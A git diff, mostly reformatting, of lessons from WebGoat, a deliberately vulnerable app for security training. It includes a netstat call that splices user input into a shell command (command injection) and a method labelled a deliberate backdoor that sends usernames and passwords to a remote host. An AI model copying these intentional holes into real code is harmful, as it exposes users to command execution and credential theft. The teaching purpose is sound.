+			Input input = new Input(Input.HIDDEN, USER, "White");
+			ec.addElement(input);
+
+			// STAGE 3 BUTTON
 			if (v.size() == 13)
 			{
 				s.setMessage("Congratulations! You stole all the credit cards, proceed to stage 3!");
 				ec.addElement(new BR());
-				//TR inf = new TR();
+				// TR inf = new TR();
 				Center center = new Center();
 				Element proceed = ECSFactory.makeButton(PROCEED_TO_NEXT_STAGE + "(3)");
 				center.addElement(proceed);
-				//inf.addElement(new TD().addElement(proceed).setAlign("center"));
+				// inf.addElement(new TD().addElement(proceed).setAlign("center"));
 				ec.addElement(center);
 			}
-		
-		}
-		catch (Exception e)
+
+		} catch (Exception e)
 		{
 			s.setMessage("An error occurred in the woods");
 		}
@@ -294,8 +289,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		// <START_OMIT_SOURCE>
 
 		ElementContainer ec = new ElementContainer();
-		if (s.getParser().getStringParameter(Input.SUBMIT, "")
-				.equals(PROCEED_TO_NEXT_STAGE + "(4)"))
+		if (s.getParser().getStringParameter(Input.SUBMIT, "").equals(PROCEED_TO_NEXT_STAGE + "(4)"))
 		{
 			setStage(s, 4);
 			// Reset the defaced webpage so the lesson can start over
@@ -309,22 +303,21 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		{
 			ec.addElement(new HR());
 			s.setMessage("CONGRATULATIONS - You have defaced the site!");
-			Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign(
-					"center");
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center");
 			if (s.isColor())
 			{
 				t.setBorder(1);
 			}
 			TR tr = new TR();
-			tr.addElement(new TD().setAlign("center").addElement(
-					ECSFactory.makeButton(PROCEED_TO_NEXT_STAGE + "(4)")));
+			tr.addElement(new TD().setAlign("center").addElement(ECSFactory.makeButton(PROCEED_TO_NEXT_STAGE + "(4)")));
 			t.addElement(tr);
 			tr = new TR();
 			tr.addElement(new TD().addElement(showDefaceAttempt(s)));
 			t.addElement(tr);
 			ec.addElement(t);
 			return ec;
-		} else
+		}
+		else
 		{
 			// Setup the screen content
 			try
@@ -332,8 +325,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 				ec.addElement(new H1("Current Network Status:"));
 				ec.addElement(netstatResults);
 
-				Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign(
-						"center");
+				Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center");
 				if (s.isColor())
 				{
 					t.setBorder(1);
@@ -342,21 +334,17 @@ public class Challenge2Screen extends SequentialLessonAdapter
 
 				TR tr = new TR();
 				tr.addElement(new TD().addElement(ECSFactory.makeButton("View Network")));
-				tr.addElement(new TD().setWidth("35%").addElement(
-						ECSFactory.makePulldown(PROTOCOL, list, "", 5)));
+				tr.addElement(new TD().setWidth("35%").addElement(ECSFactory.makePulldown(PROTOCOL, list, "", 5)));
 				t.addElement(tr);
 
 				ec.addElement(t);
-			}
-			catch (Exception e)
+			} catch (Exception e)
 			{
-				ec.addElement(new P()
-						.addElement("Select a message to read from the Message List below"));
+				ec.addElement(new P().addElement("Select a message to read from the Message List below"));
 			}
 
 			ec.addElement(new HR());
-			Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign(
-					"center");
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center");
 			if (s.isColor())
 			{
 				t.setBorder(1);
@@ -377,15 +365,13 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		try
 		{
 			// get current text and compare to the new text
-			String origpath = s.getContext().getRealPath(
-					WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
+			String origpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
 			String masterFilePath = s.getContext().getRealPath(WEBGOAT_CHALLENGE_JSP);
 			String defacedText = getFileText(new BufferedReader(new FileReader(origpath)), false);
 			String origText = getFileText(new BufferedReader(new FileReader(masterFilePath)), false);
 
 			defaced = (!origText.equals(defacedText));
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			e.printStackTrace();
 		}
@@ -398,11 +384,10 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		ElementContainer ec = new ElementContainer();
 
 		// get current text and compare to the new text
-		String origpath = s.getContext().getRealPath(
-				WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
+		String origpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
 		String defaced = getFileText(new BufferedReader(new FileReader(origpath)), false);
-		String origText = getFileText(new BufferedReader(new FileReader(s.getContext().getRealPath(
-				WEBGOAT_CHALLENGE_JSP))), false);
+		String origText = getFileText(new BufferedReader(new FileReader(s.getContext()
+				.getRealPath(WEBGOAT_CHALLENGE_JSP))), false);
 
 		// show webgoat.jsp text
 		ec.addElement(new H1().addElement("Original Website Text"));
@@ -420,8 +405,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		try
 		{
 			// get current text and compare to the new text
-			String defacedpath = s.getContext().getRealPath(
-					WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
+			String defacedpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
 			String masterFilePath = s.getContext().getRealPath(WEBGOAT_CHALLENGE_JSP);
 
 			// replace the defaced text with the original
@@ -431,8 +415,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 			fw.close();
 			// System.out.println("webgoat_guest replaced: " + getFileText( new
 			// BufferedReader( new FileReader( defacedpath ) ), false ) );
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			e.printStackTrace();
 		}
@@ -458,9 +441,8 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		ElementContainer ec = new ElementContainer();
 		ec.addElement(new H1().addElement("Thanks for coming!"));
 		ec.addElement(new BR());
-		ec
-				.addElement(new H1()
-						.addElement("Please remember that you will be caught and fired if you use these techniques for evil."));
+		ec.addElement(new H1()
+				.addElement("Please remember that you will be caught and fired if you use these techniques for evil."));
 
 		return (ec);
 	}
@@ -525,8 +507,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		ElementContainer ec = new ElementContainer();
 
 		ec.addElement(new H1().addElement("Sign In "));
-		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%")
-				.setAlign("center");
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
 
 		if (s.isColor())
 		{
@@ -534,11 +515,9 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		}
 
 		TR tr = new TR();
-		tr
-				.addElement(new TH()
-						.addElement(
-								"Please sign in to your account.  See the OWASP admin if you do not have an account.")
-						.setColSpan(2).setAlign("left"));
+		tr.addElement(new TH()
+				.addElement("Please sign in to your account.  See the OWASP admin if you do not have an account.")
+				.setColSpan(2).setAlign("left"));
 		t.addElement(tr);
 
 		tr = new TR();
@@ -594,9 +573,9 @@ public class Challenge2Screen extends SequentialLessonAdapter
 	}
 
 	/**
-	 * This is a deliberate 'backdoor' that would send user name and password
-	 * back to the remote host. Obviously, sending the password back to the
-	 * remote host isn't that useful but... you get the idea
+	 * This is a deliberate 'backdoor' that would send user name and password back to the remote
+	 * host. Obviously, sending the password back to the remote host isn't that useful but... you
+	 * get the idea
 	 * 
 	 * @param s
 	 *            Description of the Parameter
@@ -614,8 +593,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 			System.out.println("      Sending message to " + sock.getInetAddress());
 			sock.send(dp);
 			sock.close();
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			System.out.println("Couldn't phone home");
 			e.printStackTrace();
@@ -645,8 +623,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 
 		ElementContainer ec = new ElementContainer();
 
-		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%")
-				.setAlign("center");
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
 
 		if (s.isColor())
 		{
@@ -668,7 +645,8 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		{
 			String cmd = "cmd.exe /c netstat -a -p " + protocol;
 			er = Exec.execSimple(cmd);
-		} else
+		}
+		else
 		{
 			String[] cmd = { "/bin/sh", "-c", "netstat -a -p " + protocol };
 			er = Exec.execSimple(cmd);
@@ -684,7 +662,8 @@ public class Challenge2Screen extends SequentialLessonAdapter
 			if ((line.indexOf("Proto") != -1))
 			{
 				start++;
-			} else
+			}
+			else
 			{
 				line = lines.nextToken();
 			}
@@ -740,8 +719,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		{
 			OutputStreamWriter osw = new OutputStreamWriter(s.getOutputStream());
 			osw.write(message);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			System.out.println("Couldn't write " + message + " to " + s);
 			e.printStackTrace();
@@ -754,8 +732,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 
 		ec.addElement(new HR().setWidth("90%"));
 		ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
-		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%")
-				.setAlign("center");
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
 
 		if (s.isColor())
 		{
@@ -778,8 +755,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 
 		ec.addElement(t);
 
-		t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign(
-				"center");
+		t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
 
 		if (s.isColor())
 		{
@@ -815,10 +791,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 
 		for (int i = 0; i < cookies.length; i++)
 		{
-			if (cookies[i].getName().equalsIgnoreCase(USER_COOKIE))
-			{
-				return (cookies[i].getValue());
-			}
+			if (cookies[i].getName().equalsIgnoreCase(USER_COOKIE)) { return (cookies[i].getValue()); }
 		}
 
 		return (null);
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java
index 6a0f37b3a..153e66f24 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.ClientSideFiltering;
 
 import java.io.BufferedReader;
@@ -6,7 +7,6 @@ import java.io.FileReader;
 import java.io.IOException;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -28,26 +28,30 @@ import org.owasp.webgoat.lessons.SequentialLessonAdapter;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-public class ClientSideFiltering extends SequentialLessonAdapter {
+
+public class ClientSideFiltering extends SequentialLessonAdapter
+{
 
 	private final static String ANSWER = "answer";
 
-	public final static A ASPECT_LOGO = new A().setHref(
-			"http://www.aspectsecurity.com").addElement(
-			new IMG("images/logos/aspect.jpg").setAlt("Aspect Security")
-					.setBorder(0).setHspace(0).setVspace(0));
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-	protected Element createContent(WebSession s) {
+	protected Element createContent(WebSession s)
+	{
 		return super.createStagedContent(s);
 	}
 
-	protected Element createMainContent(WebSession s) {
+	protected Element createMainContent(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
 
-		try {
+		try
+		{
 
-			ec.addElement(new Script()
-					.setSrc("javascript/clientSideFiltering.js"));
+			ec.addElement(new Script().setSrc("javascript/clientSideFiltering.js"));
 
 			Input input = new Input(Input.HIDDEN, "userID", 102);
 
@@ -56,12 +60,11 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 			ec.addElement(input);
 
 			style sty = new style();
-			sty
-					.addElement("#lesson_wrapper {height: 435px;width: 500px;}"
-							+ "#lesson_header {background-image: url(lessons/Ajax/images/lesson1_header.jpg);"
-							+ "width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}"
-							+ ".lesson_workspace {background-image: url(lessons/Ajax/images/lesson1_workspace.jpg);"
-							+ "width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}");
+			sty.addElement("#lesson_wrapper {height: 435px;width: 500px;}"
+					+ "#lesson_header {background-image: url(lessons/Ajax/images/lesson1_header.jpg);"
+					+ "width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}"
+					+ ".lesson_workspace {background-image: url(lessons/Ajax/images/lesson1_workspace.jpg);"
+					+ "width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}");
 
 			ec.addElement(sty);
 
@@ -82,23 +85,20 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 			workspaceDiv.addElement(new BR());
 			workspaceDiv.addElement(new BR());
 
-			workspaceDiv.addElement(new P()
-					.addElement("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Select user:"));
+			workspaceDiv.addElement(new P().addElement("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Select user:"));
 
 			workspaceDiv.addElement(createDropDown());
 
 			workspaceDiv.addElement(new P());
 
-			Table t = new Table().setCellSpacing(0).setCellPadding(2)
-					.setBorder(1).setWidth("90%").setAlign("center");
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
 
 			t.setID("hiddenEmployeeRecords");
 			t.setStyle("display: none");
 
 			workspaceDiv.addElement(t);
 
-			t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1)
-					.setWidth("90%").setAlign("center");
+			t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
 
 			TR tr = new TR();
 			tr.addElement(new TD().addElement("UserID"));
@@ -113,7 +113,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 
 			workspaceDiv.addElement(t);
 
-		} catch (Exception e) {
+		} catch (Exception e)
+		{
 			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
 		}
@@ -127,29 +128,34 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 	 * @return The category value
 	 */
 
-	protected ElementContainer doStage1(WebSession s) {
+	protected ElementContainer doStage1(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
 
 		StringBuffer answerString = null;
 		int answer = 0;
 
-		try {
-			answerString = new StringBuffer(s.getParser().getStringParameter(
-					ANSWER, ""));
+		try
+		{
+			answerString = new StringBuffer(s.getParser().getStringParameter(ANSWER, ""));
 			answer = Integer.parseInt(answerString.toString());
-		} catch (NumberFormatException e) {
+		} catch (NumberFormatException e)
+		{
 
 			// e.printStackTrace();
 		}
 
-		if (answer == 450000) {
+		if (answer == 450000)
+		{
 
 			getLessonTracker(s).setStage(2);
 			s.setMessage("Stage 1 completed.");
 
 			// Redirect user to Stage2 content.
 			ec.addElement(doStage2(s));
-		} else {
+		}
+		else
+		{
 			ec.addElement(stage1Content(s));
 		}
 
@@ -157,7 +163,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 
 	}
 
-	protected Element doStage2(WebSession s) {
+	protected Element doStage2(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
 
 		/**
@@ -168,31 +175,36 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 		String file = s.getWebResource("lessons/Ajax/clientSideFiltering.jsp");
 		String content = getFileContent(file);
 
-		if (content.indexOf("[Managers/Manager/text()") != -1) {
+		if (content.indexOf("[Managers/Manager/text()") != -1)
+		{
 			makeSuccess(s);
 			ec.addElement(stage2Content(s));
-		} else {
+		}
+		else
+		{
 			ec.addElement(stage2Content(s));
 		}
 
 		return ec;
 	}
 
-	protected ElementContainer stage1Content(WebSession s) {
+	protected ElementContainer stage1Content(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
-		try {
+		try
+		{
 
 			ec.addElement(createMainContent(s));
 
 			Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
 
-			if (s.isColor()) {
+			if (s.isColor())
+			{
 				t1.setBorder(1);
 			}
 
 			TR tr = new TR();
-			tr.addElement(new TD()
-					.addElement("What is Neville Bartholomew's salary? "));
+			tr.addElement(new TD().addElement("What is Neville Bartholomew's salary? "));
 			tr.addElement(new TD(new Input(Input.TEXT, ANSWER, "")));
 			Element b = ECSFactory.makeButton("Submit Answer");
 			tr.addElement(new TD(b).setAlign("LEFT"));
@@ -200,7 +212,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 
 			ec.addElement(t1);
 
-		} catch (Exception e) {
+		} catch (Exception e)
+		{
 			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
 		}
@@ -208,9 +221,11 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 		return ec;
 	}
 
-	protected ElementContainer stage2Content(WebSession s) {
+	protected ElementContainer stage2Content(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
-		try {
+		try
+		{
 
 			ec.addElement(createMainContent(s));
 
@@ -219,22 +234,24 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 
 			Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
 
-			if (s.isColor()) {
+			if (s.isColor())
+			{
 				t1.setBorder(1);
 			}
 
 			TR tr = new TR();
-			/*tr.addElement(new TD()
-			 .addElement("Press 'Submit' when you believe you have completed the lesson."));
+			/*
+			 * tr.addElement(new TD() .addElement("Press 'Submit' when you believe you have
+			 * completed the lesson."));
 			 */
-			Element b = ECSFactory
-					.makeButton("Click here when you believe you have completed the lesson.");
+			Element b = ECSFactory.makeButton("Click here when you believe you have completed the lesson.");
 			tr.addElement(new TD(b).setAlign("CENTER"));
 			t1.addElement(tr);
 
 			ec.addElement(t1);
 
-		} catch (Exception e) {
+		} catch (Exception e)
+		{
 			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
 		}
@@ -242,28 +259,25 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 		return ec;
 	}
 
-	protected Select createDropDown() {
+	protected Select createDropDown()
+	{
 		Select select = new Select("UserSelect");
 
 		select.setID("UserSelect");
 
-		org.apache.ecs.html.Option option = new org.apache.ecs.html.Option(
-				"Choose Employee", "0", "Choose Employee");
+		org.apache.ecs.html.Option option = new org.apache.ecs.html.Option("Choose Employee", "0", "Choose Employee");
 
 		select.addElement(option);
 
-		option = new org.apache.ecs.html.Option("Larry Stooge", "101",
-				"Larry Stooge");
+		option = new org.apache.ecs.html.Option("Larry Stooge", "101", "Larry Stooge");
 
 		select.addElement(option);
 
-		option = new org.apache.ecs.html.Option("Curly Stooge", "103",
-				"Curly Stooge");
+		option = new org.apache.ecs.html.Option("Curly Stooge", "103", "Curly Stooge");
 
 		select.addElement(option);
 
-		option = new org.apache.ecs.html.Option("Eric Walker", "104",
-				"Eric Walker");
+		option = new org.apache.ecs.html.Option("Eric Walker", "104", "Eric Walker");
 
 		select.addElement(option);
 
@@ -271,28 +285,23 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 
 		select.addElement(option);
 
-		option = new org.apache.ecs.html.Option("Jerry Mouse", "106",
-				"Jerry Mouse");
+		option = new org.apache.ecs.html.Option("Jerry Mouse", "106", "Jerry Mouse");
 
 		select.addElement(option);
 
-		option = new org.apache.ecs.html.Option("David Giambi", "107",
-				"David Giambi");
+		option = new org.apache.ecs.html.Option("David Giambi", "107", "David Giambi");
 
 		select.addElement(option);
 
-		option = new org.apache.ecs.html.Option("Bruce McGuirre", "108",
-				"Bruce McGuirre");
+		option = new org.apache.ecs.html.Option("Bruce McGuirre", "108", "Bruce McGuirre");
 
 		select.addElement(option);
 
-		option = new org.apache.ecs.html.Option("Sean Livingston", "109",
-				"Sean Livingston");
+		option = new org.apache.ecs.html.Option("Sean Livingston", "109", "Sean Livingston");
 
 		select.addElement(option);
 
-		option = new org.apache.ecs.html.Option("Joanne McDougal", "110",
-				"Joanne McDougal");
+		option = new org.apache.ecs.html.Option("Joanne McDougal", "110", "Joanne McDougal");
 
 		select.addElement(option);
 
@@ -304,7 +313,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 
 	}
 
-	protected Category getDefaultCategory() {
+	protected Category getDefaultCategory()
+	{
 		return Category.AJAX_SECURITY;
 	}
 
@@ -313,17 +323,16 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 	 * 
 	 * @return The hints value
 	 */
-	public List<String> getHints(WebSession s) {
+	public List<String> getHints(WebSession s)
+	{
 		List<String> hints = new ArrayList<String>();
 
 		hints
 				.add("The information displayed when an employee is choosen from the drop down menu is stored on the client side.");
 
-		hints
-				.add("Use Firebug to find where the information is stored on the client side.");
+		hints.add("Use Firebug to find where the information is stored on the client side.");
 
-		hints
-				.add("Examine the hidden table to see if there is anyone listed who is not in the drop down menu.");
+		hints.add("Examine the hidden table to see if there is anyone listed who is not in the drop down menu.");
 
 		hints.add("Look in the last row of the hidden table.");
 
@@ -333,31 +342,33 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 
 		hints.add("The server uses an XPath query agasinst an XML database.");
 
-		hints
-				.add("The query currently returns all of the contents of the database.");
+		hints.add("The query currently returns all of the contents of the database.");
 
 		hints
 				.add("The query should only return the information of employees who are managed by Moe Stooge, who's userID is 102");
 
 		hints.add("Try using a filter operator.");
 
-		hints
-				.add("your filter operator shoiuld look something like: [Managers/Manager/text()=");
+		hints.add("your filter operator shoiuld look something like: [Managers/Manager/text()=");
 
 		return hints;
 
 	}
 
-	public String getInstructions(WebSession s) {
+	public String getInstructions(WebSession s)
+	{
 		String instructions = "";
 
-		if (getLessonTracker(s).getStage() == 1) {
+		if (getLessonTracker(s).getStage() == 1)
+		{
 			instructions = "STAGE 1:\tYou are Moe Stooge, CSO of Goat Hills Financial.  "
 					+ "You have access to everyone in the company's information, except the CEO, "
 					+ "Neville Bartholomew.  Or at least you shouldn't have access to the CEO's information."
 					+ "  For this exercise, "
 					+ "examine the contents of the page to see what extra information you can find.";
-		} else if (getLessonTracker(s).getStage() == 2) {
+		}
+		else if (getLessonTracker(s).getStage() == 2)
+		{
 			instructions = "STAGE 2:\tNow, fix the problem.  Modify the server to only return "
 					+ "results that Moe Stooge is allowed to see.";
 		}
@@ -366,7 +377,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 
 	private final static Integer DEFAULT_RANKING = new Integer(10);
 
-	protected Integer getDefaultRanking() {
+	protected Integer getDefaultRanking()
+	{
 		return DEFAULT_RANKING;
 	}
 
@@ -392,28 +404,37 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 	 * @return The title value
 	 */
 
-	public String getTitle() {
+	public String getTitle()
+	{
 		return ("LAB: Client Side Filtering");
 	}
 
-	private String getFileContent(String content) {
+	private String getFileContent(String content)
+	{
 		BufferedReader is = null;
 		StringBuffer sb = new StringBuffer();
 
-		try {
+		try
+		{
 			is = new BufferedReader(new FileReader(new File(content)));
 			String s = null;
 
-			while ((s = is.readLine()) != null) {
+			while ((s = is.readLine()) != null)
+			{
 				sb.append(s);
 			}
-		} catch (Exception e) {
+		} catch (Exception e)
+		{
 			e.printStackTrace();
-		} finally {
-			if (is != null) {
-				try {
+		} finally
+		{
+			if (is != null)
+			{
+				try
+				{
 					is.close();
-				} catch (IOException ioe) {
+				} catch (IOException ioe)
+				{
 
 				}
 			}
@@ -422,7 +443,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter {
 		return sb.toString();
 	}
 
-	public Element getCredits() {
+	public Element getCredits()
+	{
 		return super.getCustomCredits("", ASPECT_LOGO);
 	}
 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java
index fc48ebdb7..41010e813 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -21,58 +21,67 @@ import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
 
-public class ClientSideValidation extends SequentialLessonAdapter {
+
+public class ClientSideValidation extends SequentialLessonAdapter
+{
 
 	/**
 	 * Description of the Method
-	 *
+	 * 
 	 * @param s
 	 *            Description of the Parameter
 	 * @return Description of the Return Value
 	 */
 
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
 	private boolean stage1FirstVisit = true;
 
 	private boolean stage2FirstVisit = true;
 
-	protected Element createContent(WebSession s) {
+	protected Element createContent(WebSession s)
+	{
 		return super.createStagedContent(s);
 	}
 
-	protected Element doStage1(WebSession s) {
+	protected Element doStage1(WebSession s)
+	{
 		return evalStage1(s);
 	}
 
-	protected Element doStage2(WebSession s) {
+	protected Element doStage2(WebSession s)
+	{
 		return stage2Content(s);
 	}
 
-	protected Element evalStage1(WebSession s) {
+	protected Element evalStage1(WebSession s)
+	{
 
 		ElementContainer ec = new ElementContainer();
 
 		String param1 = s.getParser().getRawParameter("field1", "");
 
-		//test success
+		// test success
 
-		if (param1.equalsIgnoreCase("platinum")
-				|| param1.equalsIgnoreCase("gold")
-				|| param1.equalsIgnoreCase("silver")
-				|| param1.equalsIgnoreCase("bronze")
-				|| param1.equalsIgnoreCase("pressone")
-				|| param1.equalsIgnoreCase("presstwo")) {
+		if (param1.equalsIgnoreCase("platinum") || param1.equalsIgnoreCase("gold") || param1.equalsIgnoreCase("silver")
+				|| param1.equalsIgnoreCase("bronze") || param1.equalsIgnoreCase("pressone")
+				|| param1.equalsIgnoreCase("presstwo"))
+		{
 			getLessonTracker(s).setStage(2);
-			//s.resetHintCount();
+			// s.resetHintCount();
 			s.setMessage("Stage 1 completed.");
 
 			// Redirect user to Stage2 content.
 			ec.addElement(doStage2(s));
 
-		} else {
-			if (!stage1FirstVisit) {
+		}
+		else
+		{
+			if (!stage1FirstVisit)
+			{
 				s.setMessage("Keep looking for the coupon code.");
 			}
 			stage1FirstVisit = false;
@@ -84,21 +93,18 @@ public class ClientSideValidation extends SequentialLessonAdapter {
 
 	}
 
-
-	protected Element stage1Content(WebSession s) {
+	protected Element stage1Content(WebSession s)
+	{
 
 		ElementContainer ec = new ElementContainer();
 
-		try {
-
-
-			ec.addElement(new Script()
-					.setSrc("javascript/clientSideValidation.js"));
+		try
+		{
 
+			ec.addElement(new Script().setSrc("javascript/clientSideValidation.js"));
 
 			ec.addElement(new HR().setWidth("90%"));
-			ec.addElement(new Center().addElement(new H1()
-					.addElement("Shopping Cart")));
+			ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart")));
 
 			ec.addElement(createQtyTable(s));
 
@@ -106,27 +112,26 @@ public class ClientSideValidation extends SequentialLessonAdapter {
 			ec.addElement(new BR());
 			ec.addElement(new HR().setWidth("90%"));
 
-
-
-		} catch (Exception e) {
+		} catch (Exception e)
+		{
 			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
 		}
 		return (ec);
 	}
 
-	protected Element stage2Content(WebSession s) {
+	protected Element stage2Content(WebSession s)
+	{
 
 		ElementContainer ec = new ElementContainer();
 
-		try {
+		try
+		{
 
-			ec.addElement(new Script()
-					.setSrc("javascript/clientSideValidation.js"));
+			ec.addElement(new Script().setSrc("javascript/clientSideValidation.js"));
 
 			ec.addElement(new HR().setWidth("90%"));
-			ec.addElement(new Center().addElement(new H1()
-					.addElement("Shopping Cart")));
+			ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart")));
 
 			ec.addElement(createQtyTable(s));
 
@@ -136,62 +141,63 @@ public class ClientSideValidation extends SequentialLessonAdapter {
 
 			// test success
 
-			float grandTotal = s.getParser()
-					.getFloatParameter("GRANDTOT", 0.0f);
+			float grandTotal = s.getParser().getFloatParameter("GRANDTOT", 0.0f);
 
-			if (getTotalQty(s) > 0 && grandTotal == 0 && !stage2FirstVisit) {
+			if (getTotalQty(s) > 0 && grandTotal == 0 && !stage2FirstVisit)
+			{
 				makeSuccess(s);
-			} else {
+			}
+			else
+			{
 
-				if (!stage2FirstVisit) {
+				if (!stage2FirstVisit)
+				{
 					s.setMessage("Your order isn't free yet.");
 				}
 				stage2FirstVisit = false;
 			}
 
-		} catch (Exception e) {
+		} catch (Exception e)
+		{
 			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
 		}
 		return (ec);
 	}
 
-	protected ElementContainer createTotalTable(WebSession s) {
+	protected ElementContainer createTotalTable(WebSession s)
+	{
 
 		ElementContainer ec = new ElementContainer();
 
 		String param1 = s.getParser().getRawParameter("field1", "");
-		String param2 = HtmlEncoder.encode(s.getParser().getRawParameter(
-				"field2", "4128 3214 0002 1999"));
